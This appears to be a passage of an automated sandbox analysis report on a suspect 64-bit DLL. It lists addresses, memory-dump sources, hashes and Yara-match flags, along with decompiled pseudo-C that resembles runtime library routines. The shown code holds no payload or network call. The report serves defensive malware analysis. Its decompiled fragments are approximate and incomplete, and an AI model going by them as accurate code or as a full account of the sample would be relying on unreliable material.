                                                                      0x180026804
                                                                      0x18002680d
                                                                      0x180026813
                                                                      0x180026818
                                                                      0x18002681a
                                                                      0x180026820
                                                                      0x180026827
                                                                      0x18002682d
                                                                      0x180026832
                                                                      0x180026837
                                                                      0x18002683b
                                                                      0x18002683f
                                                                      0x180026843
                                                                      0x180026847
                                                                      0x18002684d
                                                                      0x180026851
                                                                      0x180026856
                                                                      0x18002685a
                                                                      0x18002685f
                                                                      0x180026863
                                                                      0x180026868
                                                                      0x18002686c
                                                                      0x180026871
                                                                      0x180026875
                                                                      0x18002687a
                                                                      0x18002687d
                                                                      0x180026881
                                                                      0x180026884
                                                                      0x180026887
                                                                      0x18002688a
                                                                      0x18002688e
                                                                      0x180026893
                                                                      0x18002689c
                                                                      0x1800268a5
                                                                      0x1800268a7
                                                                      0x1800268af
                                                                      0x1800268b7
                                                                      0x1800268c1
                                                                      0x1800268c9
                                                                      0x1800268ce
                                                                      0x1800268d8
                                                                      0x1800268db
                                                                      0x1800268ee
                                                                      0x1800268f0
                                                                      0x1800268ff
                                                                      0x180026905
                                                                      0x180026907
                                                                      0x18002690a
                                                                      0x18002690c
                                                                      0x18002690f
                                                                      0x180026911
                                                                      0x180026914
                                                                      0x180026922
                                                                      0x18002692c
                                                                      0x18002692f
                                                                      0x180026933
                                                                      0x180026939
                                                                      0x18002693d
                                                                      0x180026944
                                                                      0x180026946
                                                                      0x180026955
                                                                      0x18002695b
                                                                      0x18002695d
                                                                      0x180026960
                                                                      0x180026962
                                                                      0x180026965
                                                                      0x180026967
                                                                      0x18002696a
                                                                      0x180026978
                                                                      0x180026982
                                                                      0x180026985
                                                                      0x180026989
                                                                      0x18002698e
                                                                      0x180026992
                                                                      0x180026997
                                                                      0x1800269a7
                                                                      0x1800269a9
                                                                      0x1800269ae
                                                                      0x1800269b2
                                                                      0x1800269b5
                                                                      0x1800269bc
                                                                      0x1800269c0
                                                                      0x1800269cb
                                                                      0x1800269d0
                                                                      0x1800269d5
                                                                      0x1800269da
                                                                      0x1800269de
                                                                      0x1800269e2
                                                                      0x1800269ed
                                                                      0x1800269f2
                                                                      0x1800269f5
                                                                      0x1800269f8
                                                                      0x180026a01
                                                                      0x180026a08
                                                                      0x180026a23

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $*
                                                                      • API String ID: 0-3982473090
                                                                      • Opcode ID: cbb723abfe9f4ec0d8c8eb036de060b6dfe44589079c12ceef08ccfe426d80c4
                                                                      • Instruction ID: dbbf3c7052fd73b93ed08d9f933d8f662607d997a6fee2a04e1eca43dbe4e28e
                                                                      • Opcode Fuzzy Hash: cbb723abfe9f4ec0d8c8eb036de060b6dfe44589079c12ceef08ccfe426d80c4
                                                                      • Instruction Fuzzy Hash: AFC1B57290478886EBE78F2980543AD3BA4F30EF8DF298115EB89473A5CF35C689C755
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5z}Q$Ex]
                                                                      • API String ID: 0-4294553439
                                                                      • Opcode ID: 9db167bee22bdeb4ca21d773d4801526bf7f1cd4ef44b935738011b0b814e973
                                                                      • Instruction ID: 7eb5952b88ab30d0bdf75c18d60dc5636ac8e083ac053f22041bb9710051a11d
                                                                      • Opcode Fuzzy Hash: 9db167bee22bdeb4ca21d773d4801526bf7f1cd4ef44b935738011b0b814e973
                                                                      • Instruction Fuzzy Hash: F7C1F57051078DEFEBA8CF28D8D99DD3BA4FB44754F902229FD42862A0D779D885CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: KPm$L(X
                                                                      • API String ID: 0-3076173834
                                                                      • Opcode ID: 29e380a3567a34450ef70eeabc585a2a38296516db3d5f650c96c60c61edbd7d
                                                                      • Instruction ID: 23c2c39a974e57982b45533b8bbf3e2b806c0541b1d3e0b7dd47c408e863ff0f
                                                                      • Opcode Fuzzy Hash: 29e380a3567a34450ef70eeabc585a2a38296516db3d5f650c96c60c61edbd7d
                                                                      • Instruction Fuzzy Hash: E6C177B1900709CFDB98DF68C55A59D7BB9FB55308F00412AFC0E9A2A0E778F919CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dU$e
                                                                      • API String ID: 0-860301154
                                                                      • Opcode ID: 4d20e3d3d0ddaa607150751af3ba44bc43ce26d75f6e793552f6e28e9300345c
                                                                      • Instruction ID: 3f870f4e5ef5d9cb3345dca98c2a22da8922eae51895890ed010d6dd87033e1b
                                                                      • Opcode Fuzzy Hash: 4d20e3d3d0ddaa607150751af3ba44bc43ce26d75f6e793552f6e28e9300345c
                                                                      • Instruction Fuzzy Hash: F351177091C7848FD779DF28D48A7DABBE0FB98714F00091EE99D87256D770A845CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118003FF1C(void* __ebp, void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32, long long _a64) {
                                                                      				void* _t17;
                                                                      				long long _t32;
                                                                      				void* _t42;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      
                                                                      				_t46 = _t42;
                                                                      				 *((long long*)(_t46 + 8)) = __rbx;
                                                                      				 *((long long*)(_t46 + 0x10)) = __rbp;
                                                                      				 *((long long*)(_t46 + 0x18)) = __rsi;
                                                                      				 *((long long*)(_t46 + 0x20)) = __rdi;
                                                                      				r13b = r9b;
                                                                      				_t16 =  >  ? __ebp : 0;
                                                                      				_t17 = ( >  ? __ebp : 0) + 9;
                                                                      				if (__rdx - __rax > 0) goto 0x8003ffa4;
                                                                      				_t32 = _a64;
                                                                      				 *((long long*)(_t46 - 0x20)) = _t32;
                                                                      				r9d = 0;
                                                                      				 *(_t46 - 0x28) =  *(_t46 - 0x28) & 0x00000000;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t32 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t32 + 0x2c)) = 0x22;
                                                                      				E00000001180013858(__rax, __rbx, _t32, __rdx, __rsi, r8d, _t45);
                                                                      				return 0x22;
                                                                      			}








                                                                      0x18003ff1c
                                                                      0x18003ff1f
                                                                      0x18003ff23
                                                                      0x18003ff27
                                                                      0x18003ff2b
                                                                      0x18003ff41
                                                                      0x18003ff4a
                                                                      0x18003ff4d
                                                                      0x18003ff55
                                                                      0x18003ff57
                                                                      0x18003ff64
                                                                      0x18003ff68
                                                                      0x18003ff6b
                                                                      0x18003ff70
                                                                      0x18003ff75
                                                                      0x18003ff79
                                                                      0x18003ff7e
                                                                      0x18003ffa3

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 0-3030954782
                                                                      • Opcode ID: b77aef4419168cd85fbdfe602f9a8566b43a44a16c70e9e0f46fe6f47558506b
                                                                      • Instruction ID: af452b4378d4bdd32c16d3ea2e0aa138fc985188a983a939fed37db4c9739dfe
                                                                      • Opcode Fuzzy Hash: b77aef4419168cd85fbdfe602f9a8566b43a44a16c70e9e0f46fe6f47558506b
                                                                      • Instruction Fuzzy Hash: 1F5178327147C846E7A68F35D84179A7B91E359BD8F19C221EFA44BBC6CF3AC6488700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 5}4$C
                                                                      • API String ID: 0-1938350828
                                                                      • Opcode ID: 6403902976708640ae1ffeada9c7fdc6ad2ba0260a522af9c902725f6d7b6e44
                                                                      • Instruction ID: a5707b8affbeda9fc0b7517dae71602840f68c4dbc50564126fbb605ea6a8d48
                                                                      • Opcode Fuzzy Hash: 6403902976708640ae1ffeada9c7fdc6ad2ba0260a522af9c902725f6d7b6e44
                                                                      • Instruction Fuzzy Hash: 50415C3011DB449FE798DF28C48952BBBE0FBC4350FA0592DF59AC72A0C774D8458B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #aj$Kx=3
                                                                      • API String ID: 0-3217488289
                                                                      • Opcode ID: 5c797b4df1fad9b256fad6ce7e8cc3147628fdb8f59d641648e7e14701fbe875
                                                                      • Instruction ID: d944a35da81c2dd1932b37c176cccc813e6650f800df64bb475d9abab2418ad6
                                                                      • Opcode Fuzzy Hash: 5c797b4df1fad9b256fad6ce7e8cc3147628fdb8f59d641648e7e14701fbe875
                                                                      • Instruction Fuzzy Hash: 2851C3B180074A8FDF48CF64C88A5DE7FB0FB58398F10461DE856A6290D3B896A5CFD4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ":$fE
                                                                      • API String ID: 0-3906995390
                                                                      • Opcode ID: a4ac12280290c4e53d05e228cc403d3de4e0c1e0d207c578d24f1d8e013f81cc
                                                                      • Instruction ID: 944d27deeed362001fc5aff14f62917b5bea1bd2a253526344b208231135a6a2
                                                                      • Opcode Fuzzy Hash: a4ac12280290c4e53d05e228cc403d3de4e0c1e0d207c578d24f1d8e013f81cc
                                                                      • Instruction Fuzzy Hash: 5641D3B090074A8BDB48CF28C48A4DE7FB0FB68398F10061DF856A6290D778D6A4CBD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: HY$^(
                                                                      • API String ID: 0-913150625
                                                                      • Opcode ID: ae60d2ecb98db3c19a83d9d9c50745112f10835cee04a9db975a2c94e61bf4ed
                                                                      • Instruction ID: 5c529e1deb798f5b497dd5bbc4b980b010653dcd9581f38f10b4b6f069f8ee60
                                                                      • Opcode Fuzzy Hash: ae60d2ecb98db3c19a83d9d9c50745112f10835cee04a9db975a2c94e61bf4ed
                                                                      • Instruction Fuzzy Hash: 8241E270918B889FD798DF29C09691ABBE2FBC4304F405A1EF9968B364DB74E405CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Kj$\H7
                                                                      • API String ID: 0-1470819310
                                                                      • Opcode ID: e02b85eeaf908cf1b2fbfd8b85314d987d9180a2fff6feea1af0a8162cf9001c
                                                                      • Instruction ID: b6099d87222479c6fc5bd6adb6112071eca9f34d0175019c86bffa76f7816989
                                                                      • Opcode Fuzzy Hash: e02b85eeaf908cf1b2fbfd8b85314d987d9180a2fff6feea1af0a8162cf9001c
                                                                      • Instruction Fuzzy Hash: 6231927562C781ABC398CF28D49981ABBF1FBC9304F906A2DF8C686350D779D4468B47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: pG$v*U
                                                                      • API String ID: 0-3505048882
                                                                      • Opcode ID: 3bd1b8e7a831360d1a66145c2fd73055bfec599c398890b30ce089a6ee0b3c1c
                                                                      • Instruction ID: fee8689b1f107732b96cbff17136c5a85d3a14141f12c6f1465a2339fcbb9e16
                                                                      • Opcode Fuzzy Hash: 3bd1b8e7a831360d1a66145c2fd73055bfec599c398890b30ce089a6ee0b3c1c
                                                                      • Instruction Fuzzy Hash: C331A170628381AFD788CF28D49A92ABBE1FBC9305F846A2DF9C687350D775D445CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <G3$]
                                                                      • API String ID: 0-4166186254
                                                                      • Opcode ID: c88168ef64aa4f429de026681a664fc6940ecc10dcc568dd4b2cb10fe5369d07
                                                                      • Instruction ID: c47e8179a1bdd71173cd1f2098c9bb82438c62bd0e55d8d3a42f3fdc4fc014d6
                                                                      • Opcode Fuzzy Hash: c88168ef64aa4f429de026681a664fc6940ecc10dcc568dd4b2cb10fe5369d07
                                                                      • Instruction Fuzzy Hash: 96319F716187818BC349DF28D45A41ABBE1FBCD34CF404B1DF8CAA6290D778D605CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: . $<
                                                                      • API String ID: 0-925536456
                                                                      • Opcode ID: 46f595ef1a13ba9ca77d57b7316055d0dcd1c26d9f7725bcfa2b7b4e5811abdf
                                                                      • Instruction ID: b707d3d85b1bd6d8b26a97e4cde9180bc5f1f575b8cb1df9caa9cf94e29c087b
                                                                      • Opcode Fuzzy Hash: 46f595ef1a13ba9ca77d57b7316055d0dcd1c26d9f7725bcfa2b7b4e5811abdf
                                                                      • Instruction Fuzzy Hash: 1B317DB050078E8BDB48CF64C89A5DE7BB0FB58348F104A19E86AA6250D7B8D665CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: D:$Jt
                                                                      • API String ID: 0-2524835271
                                                                      • Opcode ID: 00adb518f4a377436bfc13d372ed3ffb9f7c509576200b01d853cd1b777bf2fb
                                                                      • Instruction ID: e46578d901494d2d410e460e02e69a6152980e76f69b81cf0e7a8061526b68ca
                                                                      • Opcode Fuzzy Hash: 00adb518f4a377436bfc13d372ed3ffb9f7c509576200b01d853cd1b777bf2fb
                                                                      • Instruction Fuzzy Hash: DE2125716097858FD388DF29D58A91ABBE1FB98304F405A1DF896C77A0D3B4D805CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: bo$ql
                                                                      • API String ID: 0-200392605
                                                                      • Opcode ID: 49a63f80b3cf942ec14c7559319064d97289fba25de2560de07b8424bd4e48a4
                                                                      • Instruction ID: 9ac54d8685833e0ca69d61d630ce1e193934aa4d7d1cf69b4db32b21aa09a4aa
                                                                      • Opcode Fuzzy Hash: 49a63f80b3cf942ec14c7559319064d97289fba25de2560de07b8424bd4e48a4
                                                                      • Instruction Fuzzy Hash: F53147B052D381AFD398DF28C48581BBBE1FB89744F906A1DF9868B2A0D7759845CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: <$ZD
                                                                      • API String ID: 0-2501396078
                                                                      • Opcode ID: 2824c35daa3de74f518df19ab1b75e9d9cda817f1187cf5d760b8d6fedb945b2
                                                                      • Instruction ID: 889ed5917f9bc7f1db312caac09e74f0ae3dbe9b25d68788710c732ab2202cd7
                                                                      • Opcode Fuzzy Hash: 2824c35daa3de74f518df19ab1b75e9d9cda817f1187cf5d760b8d6fedb945b2
                                                                      • Instruction Fuzzy Hash: 1B3158B45187818BD349DF28C04951ABBF1FBCC35CF904B1DF4CAAB290D77896058B4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dy$N
                                                                      • API String ID: 0-2062038628
                                                                      • Opcode ID: c97720179c95e872637b076776cb8797f0f432bfdfd54f8af27558e2adab77d4
                                                                      • Instruction ID: b81eaedfa1b47c0535ad8d33749dea35a2302927e923eef3d3fa6c64c428c6af
                                                                      • Opcode Fuzzy Hash: c97720179c95e872637b076776cb8797f0f432bfdfd54f8af27558e2adab77d4
                                                                      • Instruction Fuzzy Hash: 8F212770109B459BE398DF38C58952ABBE1FB94740FA0691DF9D6C63B4DB748845CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: mqce$0
                                                                      • API String ID: 0-3394611740
                                                                      • Opcode ID: 8dc2d1d1b7f3fd8bee6d8350731ba4bb420b9c2bbd674ba1816a43f94c9f9f38
                                                                      • Instruction ID: 81d3bf9a475a8d1d4b0e927d375d3f3f1ad0bfb341bd954279ae48af79d97aab
                                                                      • Opcode Fuzzy Hash: 8dc2d1d1b7f3fd8bee6d8350731ba4bb420b9c2bbd674ba1816a43f94c9f9f38
                                                                      • Instruction Fuzzy Hash: 162173B0528381ABD389DF28C49991FBBE0FB89318F806A1DF98687350D7799444CB43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: EL$]F
                                                                      • API String ID: 0-2123762467
                                                                      • Opcode ID: 6ff1bc6076d5c0883e645f9af8d2b2bb5d9b8d4104f608c8574d48437c290935
                                                                      • Instruction ID: 15bde9ab4a755d8664b440b8dc0660d87f98eaf1f28cb99fbefd95b79a5befe6
                                                                      • Opcode Fuzzy Hash: 6ff1bc6076d5c0883e645f9af8d2b2bb5d9b8d4104f608c8574d48437c290935
                                                                      • Instruction Fuzzy Hash: E52128B45083819BD349DF68C48941ABBE0FB9D71CF400B5DF4C9AB291D778D644CB4A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 82%
                                                                      			E00000001180045A70(intOrPtr __edx, void* __ebp, signed long long __rax, long long __rbx, signed long long __rcx, void* __rdx, void* __r10, signed char _a8, intOrPtr _a16, long long _a24) {
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				void* _t40;
                                                                      				void* _t44;
                                                                      				void* _t46;
                                                                      				void* _t48;
                                                                      				void* _t63;
                                                                      				intOrPtr _t74;
                                                                      				void* _t82;
                                                                      				void* _t85;
                                                                      				void* _t87;
                                                                      				void* _t90;
                                                                      				void* _t91;
                                                                      				signed long long _t112;
                                                                      				intOrPtr _t114;
                                                                      				signed long long _t116;
                                                                      				intOrPtr* _t119;
                                                                      				intOrPtr* _t122;
                                                                      				signed long long _t128;
                                                                      				signed long long _t130;
                                                                      				signed long long _t131;
                                                                      				void* _t157;
                                                                      				long long _t162;
                                                                      				signed long long _t163;
                                                                      				signed long long _t164;
                                                                      				void* _t171;
                                                                      				void* _t173;
                                                                      				void* _t175;
                                                                      				signed long long _t176;
                                                                      				signed long long _t177;
                                                                      				signed long long _t179;
                                                                      				signed long long _t181;
                                                                      				intOrPtr* _t182;
                                                                      				long long _t186;
                                                                      
                                                                      				_t112 = __rax;
                                                                      				_a24 = __rbx;
                                                                      				_a16 = __edx;
                                                                      				_t186 = __rcx;
                                                                      				if (__rcx != 0) goto 0x80045aa4;
                                                                      				E00000001180013B18(__rax);
                                                                      				 *__rax = 0x16;
                                                                      				goto 0x80045d97;
                                                                      				E0000000118005B974(_t63, 0x3d, __rcx, __rcx, __rdx, _t171);
                                                                      				_t176 = _t112;
                                                                      				if (_t112 == 0) goto 0x80045d84;
                                                                      				if (_t112 == __rcx) goto 0x80045d84;
                                                                      				_t177 =  *0x800717a0; // 0x19428c88c40
                                                                      				_t82 = _t177 -  *0x800717b8; // 0x19428c88c40
                                                                      				bpl =  *(_t112 + 1);
                                                                      				_a8 = bpl;
                                                                      				if (_t82 != 0) goto 0x80045af1;
                                                                      				0x8004612c();
                                                                      				 *0x800717a0 = _t112;
                                                                      				r12d = 1;
                                                                      				if (_t112 != 0) goto 0x80045bca;
                                                                      				if (__edx == 0) goto 0x80045b59;
                                                                      				_t85 =  *0x800717a8 - _t162; // 0x0
                                                                      				if (_t85 == 0) goto 0x80045b59;
                                                                      				E0000000118003B97C(_t177, __rcx, _t162);
                                                                      				if (_t112 != 0) goto 0x80045b35;
                                                                      				E00000001180013B18(_t112);
                                                                      				 *_t112 = 0x16;
                                                                      				_t164 = _t163 | 0xffffffff;
                                                                      				E0000000118003F8F4(_t112, __rcx);
                                                                      				goto 0x80045d9b;
                                                                      				_t179 =  *0x800717a0; // 0x19428c88c40
                                                                      				_t87 = _t179 -  *0x800717b8; // 0x19428c88c40
                                                                      				if (_t87 != 0) goto 0x80045bc1;
                                                                      				0x8004612c();
                                                                      				 *0x800717a0 = _t112;
                                                                      				goto 0x80045bc1;
                                                                      				if (bpl == 0) goto 0x80045c7a;
                                                                      				E00000001180042404(__ebp, _t173, __rdx, __r10);
                                                                      				 *0x800717a0 = _t112;
                                                                      				_t40 = E0000000118003F8F4(_t112, _t173);
                                                                      				_t181 =  *0x800717a0; // 0x19428c88c40
                                                                      				if (_t181 == 0) goto 0x80045b22;
                                                                      				_t90 =  *0x800717a8 - _t162; // 0x0
                                                                      				if (_t90 != 0) goto 0x80045bc1;
                                                                      				E00000001180042404(_t40, _t173, __rdx, __r10);
                                                                      				 *0x800717a8 = _t112;
                                                                      				E0000000118003F8F4(_t112, _t173);
                                                                      				_t91 =  *0x800717a8 - _t162; // 0x0
                                                                      				if (_t91 == 0) goto 0x80045b22;
                                                                      				_t182 =  *0x800717a0; // 0x19428c88c40
                                                                      				if (_t182 == 0) goto 0x80045b22;
                                                                      				_t175 = _t176 - __rcx;
                                                                      				_t122 = _t182;
                                                                      				if ( *_t182 == 0) goto 0x80045c0f;
                                                                      				if (E0000000118005311C(_t74, _t122, __rcx,  *_t182, _t162, _t164, _t175, _t171) != 0) goto 0x80045bfd;
                                                                      				_t114 =  *_t122;
                                                                      				if ( *((char*)(_t175 + _t114)) == 0x3d) goto 0x80045c06;
                                                                      				if ( *((intOrPtr*)(_t175 + _t114)) == sil) goto 0x80045c06;
                                                                      				goto 0x80045bd6;
                                                                      				goto 0x80045c19;
                                                                      				_t128 =  ~((_t122 + 8 - _t182 >> 3) - _t182 >> 3);
                                                                      				if (_t128 < 0) goto 0x80045c75;
                                                                      				if ( *_t182 == _t162) goto 0x80045c75;
                                                                      				_t44 = E0000000118003F8F4( *((intOrPtr*)(_t122 + 8)),  *(_t182 + _t128 * 8));
                                                                      				if (bpl == 0) goto 0x80045c46;
                                                                      				 *(_t182 + _t128 * 8) = __rcx;
                                                                      				goto 0x80045cd5;
                                                                      				_t12 = _t128 * 8; // 0x19428c7b450
                                                                      				_t116 =  *((intOrPtr*)(_t182 + _t12 + 8));
                                                                      				 *(_t182 + _t128 * 8) = _t116;
                                                                      				if ( *((intOrPtr*)(_t182 + (_t128 + 1) * 8)) != _t162) goto 0x80045c3a;
                                                                      				r8d = 8;
                                                                      				E00000001180046590(_t44, _t128 + 1, _t182, _t128 + 1, _t162, _t164, _t175);
                                                                      				_t130 = _t116;
                                                                      				_t46 = E0000000118003F8F4(_t116, _t182);
                                                                      				if (_t130 == 0) goto 0x80045cd8;
                                                                      				 *0x800717a0 = _t130;
                                                                      				goto 0x80045cd8;
                                                                      				if (bpl != 0) goto 0x80045c81;
                                                                      				goto 0x80045b26;
                                                                      				_t131 =  ~_t130;
                                                                      				_t18 = _t131 + 2; // 0x19428c88c42
                                                                      				_t157 = _t18;
